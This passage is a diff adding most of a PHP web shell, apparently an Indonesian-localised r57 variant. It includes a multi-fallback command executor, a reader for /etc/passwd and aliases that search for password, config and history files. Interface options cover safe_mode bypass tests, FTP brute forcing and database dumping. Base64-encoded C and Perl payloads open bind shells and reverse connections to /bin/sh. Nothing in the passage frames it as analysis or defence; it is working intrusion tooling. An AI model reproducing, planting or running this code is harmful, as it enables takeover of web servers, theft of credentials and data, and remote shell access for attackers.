Master</b></div></font></td></tr>'; + foreach (@ini_get_all() as $key=>$value) + { + $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>'; + } + echo $r; + echo '</table>'; + } +echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; +die(); +} +if(isset($_GET['cpu'])) + { + echo $head; + echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>'; + $cpuf = @file("cpuinfo"); + if($cpuf) + { + $c = @sizeof($cpuf); + for($i=0;$i<$c;$i++) + { + $info = @explode(":",$cpuf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; + } + echo $r; + } + else + { + echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>'; + } + echo '</table>'; + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['REQUEST_URI'].">KEMBALI</a> ]</b></font></div>"; + die(); + } +if(isset($_GET['mem'])) + { + echo $head; + echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>'; + $memf = @file("meminfo"); + if($memf) + { + $c = sizeof($memf); + for($i=0;$i<$c;$i++) + { + $info = explode(":",$memf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; + } + echo $r; + } + else + { + echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>'; + } + echo '</table>'; + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['REQUEST_URI'].">KEMBALI</a> ]</b></font></div>"; + die(); + } +$lang=array( +'ru_text1' =>'', +'ru_text2' =>'', +'ru_text3' =>'', +'ru_text4' =>'', +'ru_text5' =>'', +'ru_text6' =>'', +'ru_text7' =>'', +'ru_text8' =>'', +'ru_butt1' =>'', +'ru_butt2' =>'', +'ru_text9' =>'', +'ru_text10'=>'', +'ru_text11'=>'', +'ru_butt3' =>'', +'ru_text12'=>'', +'ru_text13'=>'', +'ru_text14'=>'', +'ru_butt4' =>'', +'ru_text15'=>'', +'ru_text16'=>'', +'ru_text17'=>'', +'ru_text18'=>'', +'ru_text19'=>'', +'ru_text20'=>'', +'ru_text21'=>'', +'ru_text22'=>'', +'ru_text23'=>'', +'ru_text24'=>'', +'ru_text25'=>'', +'ru_text26'=>'', +'ru_butt5' =>'', +'ru_text28'=>'', +'ru_text29'=>'', +'ru_butt6' =>'', +'ru_text30'=>'', +'ru_butt7' =>'', +'ru_text31'=>'', +'ru_text32'=>'', +'ru_text33'=>'', +'ru_butt8' =>'', +'ru_text34'=>'', +'ru_text35'=>'', +'ru_text36'=>'', +'ru_text37'=>'', +'ru_text38'=>'', +'ru_text39'=>'', +'ru_text40'=>'', +'ru_butt9' =>'', +'ru_text41'=>'', +'ru_text42'=>'', +'ru_text43'=>'', +'ru_butt10'=>'', +'ru_butt11'=>'', +'ru_text44'=>'', +'ru_text45'=>'', +'ru_text46'=>'', +'ru_text47'=>'', +'ru_text48'=>'', +'ru_text49'=>'', +'ru_text50'=>'', +'ru_text51'=>'', +'ru_text52'=>'', +'ru_text53'=>'', +'ru_text54'=>'', +'ru_butt12'=>'', +'ru_text55'=>'', +'ru_text56'=>'', +'ru_text57'=>'', +'ru_text58'=>'', +'ru_text59'=>'', +'ru_text60'=>'', +'ru_butt13'=>'', +'ru_text61'=>'', +'ru_text62'=>'', +'ru_text63'=>'', +'ru_text64'=>'', +'ru_text65'=>'', +'ru_text66'=>'', +'ru_text67'=>'', +'ru_text68'=>'', +'ru_text69'=>'', +'ru_text70'=>'', +'ru_text71'=>"", +'ru_text72'=>'', +'ru_text73'=>'', +'ru_text74'=>'', +'ru_text75'=>'', +'ru_text76'=>'', +'ru_text80'=>'', +'ru_text81'=>'', +'ru_text82'=>'', +'ru_text83'=>'', +'ru_text84'=>'', +'ru_text85'=>'', +'ru_text86'=>'', +'ru_butt14'=>'', +'ru_text87'=>'', +'ru_text88'=>'', +'ru_text89'=>'', +'ru_text90'=>'', +'ru_text91'=>'', +'ru_text92'=>'', +'ru_text93'=>'', +'ru_text94'=>'', +'ru_text95'=>'', +'ru_text96'=>'', +'ru_text97'=>'', +'ru_text98'=>'', +'ru_text99'=>'', +'ru_text100'=>'', +'ru_text101'=>'', +'ru_text102'=>'', +'ru_text103'=>'', +'ru_text104'=>'', +'ru_text105'=>'', +'ru_text106'=>'', +'ru_text107'=>'', +'ru_butt15'=>'', +'ru_text108'=>'', +'ru_text109'=>'', +'ru_text110'=>'', +'ru_text111'=>'', +'ru_text112'=>'', +'ru_text113'=>'', +'ru_text114'=>'', +/* --------------------------------------------------------------- */ +'eng_text1' =>'Jalankan Perintah', +'eng_text2' =>'Jalankan perintah di server', +'eng_text3' =>'Jalankan perintah', +'eng_text4' =>'Direktori kerja', +'eng_text5' =>'Upload file ke server', +'eng_text6' =>'File Lokal', +'eng_text7' =>'Alias', +'eng_text8' =>'Pilih alias', +'eng_butt1' =>'Jalankan', +'eng_butt2' =>'Upload', +'eng_text9' =>'Bind port ke /bin/bash', +'eng_text10'=>'Port', +'eng_text11'=>'Password', +'eng_butt3' =>'Bind', +'eng_text12'=>'back-connect', +'eng_text13'=>'IP', +'eng_text14'=>'Port', +'eng_butt4' =>'Konek', +'eng_text15'=>'Upload file dari remote server', +'eng_text16'=>'Dengan', +'eng_text17'=>'File Remote', +'eng_text18'=>'File lokal', +'eng_text19'=>'Exploit', +'eng_text20'=>'Penggunaan', +'eng_text21'=>'&nbsp;Nama baru', +'eng_text22'=>'datapipe', +'eng_text23'=>'Port Lokal', +'eng_text24'=>'Remote host', +'eng_text25'=>'Remote port', +'eng_text26'=>'Penggunaan', +'eng_butt5' =>'Jalankan', +'eng_text28'=>'Bekerja di safe_mode', +'eng_text29'=>'Akses Dilarang', +'eng_butt6' =>'Ubah', +'eng_text30'=>'Lihat file', +'eng_butt7' =>'Tamppilkan', +'eng_text31'=>'File tidak ditemukan', +'eng_text32'=>'Eval kode PHP', +'eng_text33'=>'Test bypass open_basedir dengan fungsi cURL', +'eng_butt8' =>'Test', +'eng_text34'=>'Test bypass safe_mode dengan include', +'eng_text35'=>'Test bypass safe_mode dengan load file di mysql', +'eng_text36'=>'Database . Table', +'eng_text37'=>'Login', +'eng_text38'=>'Password', +'eng_text39'=>'Database', +'eng_text40'=>'Dump database table', +'eng_butt9' =>'Dump', +'eng_text41'=>'Simpan dump di file', +'eng_text42'=>'Edit file', +'eng_text43'=>'File di edit', +'eng_butt10'=>'Simpan', +'eng_text44'=>'Tidak bisa mengedit file! Baca saja!', +'eng_text45'=>'File tersimpan', +'eng_text46'=>'Tampilkan phpinfo()', +'eng_text47'=>'Tampilkan variable dari php.ini', +'eng_text48'=>'Hapus File temp', +'eng_butt11'=>'Edit file', +'eng_text49'=>'Hapus script dari server', +'eng_text50'=>'Lihat cpu info', +'eng_text51'=>'Lihat memory info', +'eng_text52'=>'Cari text', +'eng_text53'=>'Di dir', +'eng_text54'=>'Cari text di file', +'eng_butt12'=>'Cari', +'eng_text55'=>'Hanya di file', +'eng_text56'=>'Tidak ada :(', +'eng_text57'=>'Buat/Hapus File/Dir', +'eng_text58'=>'nama', +'eng_text59'=>'file', +'eng_text60'=>'dir', +'eng_butt13'=>'Buat/Hapus', +'eng_text61'=>'File dibuat', +'eng_text62'=>'Dir dibuat', +'eng_text63'=>'File dihapus', +'eng_text64'=>'Dir dihapus', +'eng_text65'=>'Buat', +'eng_text66'=>'Hapus', +'eng_text67'=>'Chown/Chgrp/Chmod', +'eng_text68'=>'Command', +'eng_text69'=>'param1', +'eng_text70'=>'param2', +'eng_text71'=>"Perintah kedua adalah:\r\n- for CHOWN - nama dari owner baru atau UID\r\n- for CHGRP - nama group atau GID\r\n- untuk CHMOD - 0777, 0755...", +'eng_text72'=>'Text yang dicari', +'eng_text73'=>'Cari di folder', +'eng_text74'=>'Cari di files', +'eng_text75'=>'* tidak bisa menggunakan regexp', +'eng_text76'=>'Cari text di file menggunakan find', +'eng_text80'=>'Type', +'eng_text81'=>'Net', +'eng_text82'=>'Databases', +'eng_text83'=>'Jalankan SQL query', +'eng_text84'=>'SQL query', +'eng_text85'=>'Test bypass safe_mode dengan memanfaatkan MSSQL server', +'eng_text86'=>'Download file dari server', +'eng_butt14'=>'Download', +'eng_text87'=>'Download file dari remote ftp-server', +'eng_text88'=>'FTP-server:port', +'eng_text89'=>'File di ftp', +'eng_text90'=>'Transfer mode', +'eng_text91'=>'Archivation', +'eng_text92'=>'tanpa peng-archive-an', +'eng_text93'=>'FTP', +'eng_text94'=>'FTP-bruteforce', +'eng_text95'=>'Daftar user', +'eng_text96'=>'Tidak bisa mendapatkan daftar user', +'eng_text97'=>'checked: ', +'eng_text98'=>'sukses: ', +'eng_text99'=>'* Gunakan username dari /etc/passwd untuk ftp login dan password', +'eng_text100'=>'Kirim file ke remote ftp server', +'eng_text101'=>'Gukanan kebalikan (user -> resu) login untuk password', +'eng_text102'=>'Mail', +'eng_text103'=>'Kirim email', +'eng_text104'=>'Kirim file to email', +'eng_text105'=>'Kepada', +'eng_text106'=>'Dari', +'eng_text107'=>'Subj', +'eng_butt15'=>'Kirim', +'eng_text108'=>'Mail', +'eng_text109'=>'Sembunyikan', +'eng_text110'=>'Tampilkan', +'eng_text111'=>'SQL-Server : Port', +'eng_text112'=>'Test bypass safe_mode dengan fungsi mb_send_mail', +'eng_text113'=>'Test bypass safe_mode, tampilkan dafter dir via imap_list', +'eng_text114'=>'Test bypass safe_mode, tampilkan isi file via imap_body', +); +$aliases=array( +'find suid files'=>'find / -type f -perm -04000 -ls', +'find suid files in current dir'=>'find . -type f -perm -04000 -ls', +'find sgid files'=>'find / -type f -perm -02000 -ls', +'find sgid files in current dir'=>'find . -type f -perm -02000 -ls', +'find config.inc.php files'=>'find / -type f -name config.inc.php', +'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php', +'find config* files'=>'find / -type f -name "config*"', +'find config* files in current dir'=>'find . -type f -name "config*"', +'find all writable files'=>'find / -type f -perm -2 -ls', +'find all writable files in current dir'=>'find . -type f -perm -2 -ls', +'find all writable directories'=>'find / -type d -perm -2 -ls', +'find all writable directories in current dir'=>'find . -type d -perm -2 -ls', +'find all writable directories and files'=>'find / -perm -2 -ls', +'find all writable directories and files in current dir'=>'find . -perm -2 -ls', +'find all service.pwd files'=>'find / -type f -name service.pwd', +'find service.pwd files in current dir'=>'find . -type f -name service.pwd', +'find all .htpasswd files'=>'find / -type f -name .htpasswd', +'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd', +'find all .bash_history files'=>'find / -type f -name .bash_history', +'find .bash_history files in current dir'=>'find . -type f -name .bash_history', +'find all .mysql_history files'=>'find / -type f -name .mysql_history', +'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history', +'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc', +'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc', +'list file attributes on a Linux second extended file system'=>'lsattr -va', +'show opened ports'=>'netstat -an | grep -i listen', +'----------------------------------------------------------------------------------------------------'=>'ls -la' +); +$table_up1 = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: "; +$table_up2 = " ::</div></b></font></td></tr><tr><td>"; +$table_up3 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>"; +$table_end1 = "</td></tr>"; +$arrow = " <font face=Wingdings color=gray>?</font>"; +$lb = "<font color=black>[</font>"; +$rb = "<font color=black>]</font>"; +$font = "<font face=Verdana size=-2>"; +$ts = "<table class=table1 width=100% align=center>"; +$te = "</table>"; +$fs = "<form name=form method=POST>"; +$fe = "</form>"; + +if(isset($_GET['users'])) + { + if(!$users=get_users()) { echo "<center><font face=Verdana size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; } + else + { + echo '<center>'; + foreach($users as $user) { echo $user."<br>"; } + echo '</center>'; + } + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['REQUEST_URI'].">KEMBALI</a> ]</b></font></div>"; die(); + } + +if (!empty($_POST['dir'])) { @chdir($_POST['dir']); } +$dir = @getcwd(); +$windows = 0; +$unix = 0; +if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1; +if(empty($dir)) + { + $os = getenv('OS'); + if(empty($os)){ $os = php_uname(); } + if(empty($os)){ $os ="-"; $unix=1; } + else + { + if(@eregi("^win",$os)) { $windows = 1; } + else { $unix = 1; } + } + } +if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text") + { + echo $head; + if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); } + else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); } + $sr->SearchText(0,0); + $res = $sr->GetResultFiles(); + $found = $sr->GetMatchesCount(); + $titles = $sr->GetTitles(); + $r = ""; + if($found > 0) + { + $r .= "<TABLE width=100%>"; + foreach($res as $file=>$v) + { + $r .= "<TR>"; + $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3); + $r .= ($windows)? str_replace("/","\\",$file) : $file; + $r .= "</b></font></ TD>"; + $r .= "</TR>"; + foreach($v as $a=>$b) + { + $r .= "<TR>"; + $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>"; + $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>"; + $r .= "</TR>\n"; + } + } + $r .= "</TABLE>"; + echo $r; + } + else + { + echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>"; + } + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['REQUEST_URI'].">KEMBALI</a> ]</b></font></div>"; + die(); + } +if(strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; } +$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE'); +if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; } +function ws($i) +{ +return @str_repeat("&nbsp;",$i); +} +function ex($cfe) +{ + $res = ''; + if (!empty($cfe)) + { + if(function_exists('exec')) + { + @exec($cfe,$res); + $res = join("\n",$res); + } + elseif(function_exists('shell_exec')) + { + $res = @shell_exec($cfe); + } + elseif(function_exists('system')) + { + @ob_start(); + @system($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(function_exists('passthru')) + { + @ob_start(); + @passthru($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + } + return $res; +} +function get_users() +{ + $users = array(); + $rows=file('/etc/passwd'); + if(!$rows) return 0; + foreach ($rows as $string) + { + $user = @explode(":",$string); + if(substr($string,0,1)!='#') array_push($users,$user[0]); + } + return $users; +} +function we($i) +{ +if($GLOBALS['language']=="ru"){ $text = ''; } +else { $text = "[-] ERROR! Tidak bisa menulis file "; } +echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>"; +return null; +} +function re($i) +{ +if($GLOBALS['language']=="ru"){ $text = ''; } +else { $text = "[-] ERROR! Tidak bisa membaca file "; } +echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>"; +return null; +} +function ce($i) +{ +if($GLOBALS['language']=="ru"){ $text = ""; } +else { $text = "Tidak bisa membuat "; } +echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>"; +return null; +} +function fe($l,$n) +{ +$text['ru'] = array('','',''); +$text['eng'] = array('Koneksi ke ftp server gagal','Login ke ftp server gagal','Tidak bisa mengubah dir di ftp server'); +echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text[$l][$n]."</b></div></font></td></tr></table>"; +return null; +} +function mr($l,$n) +{ +$text['ru'] = array(''); +$text['eng'] = array('Tidak bisa mengirim email','Email terkirim'); +echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text[$l][$n]."</b></div></font></td></tr></table>"; +return null; +} +function perms($mode) +{ +if ($GLOBALS['windows']) return 0; +if( $mode & 0x1000 ) { $type='p'; } +else if( $mode & 0x2000 ) { $type='c'; } +else if( $mode & 0x4000 ) { $type='d'; } +else if( $mode & 0x6000 ) { $type='b'; } +else if( $mode & 0x8000 ) { $type='-'; } +else if( $mode & 0xA000 ) { $type='l'; } +else if( $mode & 0xC000 ) { $type='s'; } +else $type='u'; +$owner["read"] = ($mode & 00400) ? 'r' : '-'; +$owner["write"] = ($mode & 00200) ? 'w' : '-'; +$owner["execute"] = ($mode & 00100) ? 'x' : '-'; +$group["read"] = ($mode & 00040) ? 'r' : '-'; +$group["write"] = ($mode & 00020) ? 'w' : '-'; +$group["execute"] = ($mode & 00010) ? 'x' : '-'; +$world["read"] = ($mode & 00004) ? 'r' : '-'; +$world["write"] = ($mode & 00002) ? 'w' : '-'; +$world["execute"] = ($mode & 00001) ? 'x' : '-'; +if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; +if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S'; +if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T'; +$s=sprintf("%1s", $type); +$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); +$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); +$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); +return trim($s); +} +function in($type,$name,$size,$value) +{ + $ret = "<input type=".$type." name=".$name." "; + if($size != 0) { $ret .= "size=".$size." "; } + $ret .= "value=\"".$value."\">"; + return $ret; +} +function which($pr) +{ +$path = ex("which $pr"); +if(!empty($path)) { return $path; } else { return $pr; } +} +function cf($fname,$text) +{ + $w_file=@fopen($fname,"w") or we($fname); + if($w_file) + { + @fputs($w_file,@base64_decode($text)); + @fclose($w_file); + } +} +function sr($l,$t1,$t2) + { + return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>"; + } +if (!@function_exists("view_size")) +{ +function view_size($size) +{ + if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} + elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} + elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} + else {$size = $size . " B";} + return $size; +} +} + function DirFilesR($dir,$types='') + { + $files = Array(); + if(($handle = @opendir($dir))) + { + while (false !== ($file = @readdir($handle))) + { + if ($file != "." && $file != "..") + { + if(@is_dir($dir."/".$file)) + $files = @array_merge($files,DirFilesR($dir."/".$file,$types)); + else + { + $pos = @strrpos($file,"."); + $ext = @substr($file,$pos,@strlen($file)-$pos); + if($types) + { + if(@in_array($ext,explode(';',$types))) + $files[] = $dir."/".$file; + } + else + $files[] = $dir."/".$file; + } + } + } + @closedir($handle); + } + return $files; + } + class SearchResult + { + var $text; + var $FilesToSearch; + var $ResultFiles; + var $FilesTotal; + var $MatchesCount; + var $FileMatschesCount; + var $TimeStart; + var $TimeTotal; + var $titles; + function SearchResult($dir,$text,$filter='') + { + $dirs = @explode(";",$dir); + $this->FilesToSearch = Array(); + for($a=0;$a<count($dirs);$a++) + $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter)); + $this->text = $text; + $this->FilesTotal = @count($this->FilesToSearch); + $this->TimeStart = getmicrotime(); + $this->MatchesCount = 0; + $this->ResultFiles = Array(); + $this->FileMatchesCount = Array(); + $this->titles = Array(); + } + function GetFilesTotal() { return $this->FilesTotal; } + function GetTitles() { return $this->titles; } + function GetTimeTotal() { return $this->TimeTotal; } + function GetMatchesCount() { return $this->MatchesCount; } + function GetFileMatchesCount() { return $this->FileMatchesCount; } + function GetResultFiles() { return $this->ResultFiles; } + function SearchText($phrase=0,$case=0) { + $qq = @explode(' ',$this->text); + $delim = '|'; + if($phrase) + foreach($qq as $k=>$v) + $qq[$k] = '\b'.$v.'\b'; + $words = '('.@implode($delim,$qq).')'; + $pattern = "/".$words."/"; + if(!$case) + $pattern .= 'i'; + foreach($this->FilesToSearch as $k=>$filename) + { + $this->FileMatchesCount[$filename] = 0; + $FileStrings = @file($filename) or @next; + for($a=0;$a<@count($FileStrings);$a++) + { + $count = 0; + $CurString = $FileStrings[$a]; + $CurString = @Trim($CurString); + $CurString = @strip_tags($CurString); + $aa = ''; + if(($count = @preg_match_all($pattern,$CurString,$aa))) + { + $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString); + $this->ResultFiles[$filename][$a+1] = $CurString; + $this->MatchesCount += $count; + $this->FileMatchesCount[$filename] += $count; + } + } + } + $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4); + } + } + function getmicrotime() + { + list($usec,$sec) = @explode(" ",@microtime()); + return ((float)$usec + (float)$sec); + } +$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS +A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I +GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt +b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9 +pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF +NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK +ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog +ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk +7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2 +9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld +2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu +dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp +lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0="; +$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS +VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs +JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV +TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG +lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK +Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i +Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N +lIENPTk47DQpleGl0IDA7DQp9DQp9"; +$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj +aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR +hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT +sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI +kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi +KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl +OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; +$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC +BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb +SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd +KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ +sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC +Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D +QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp +Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; 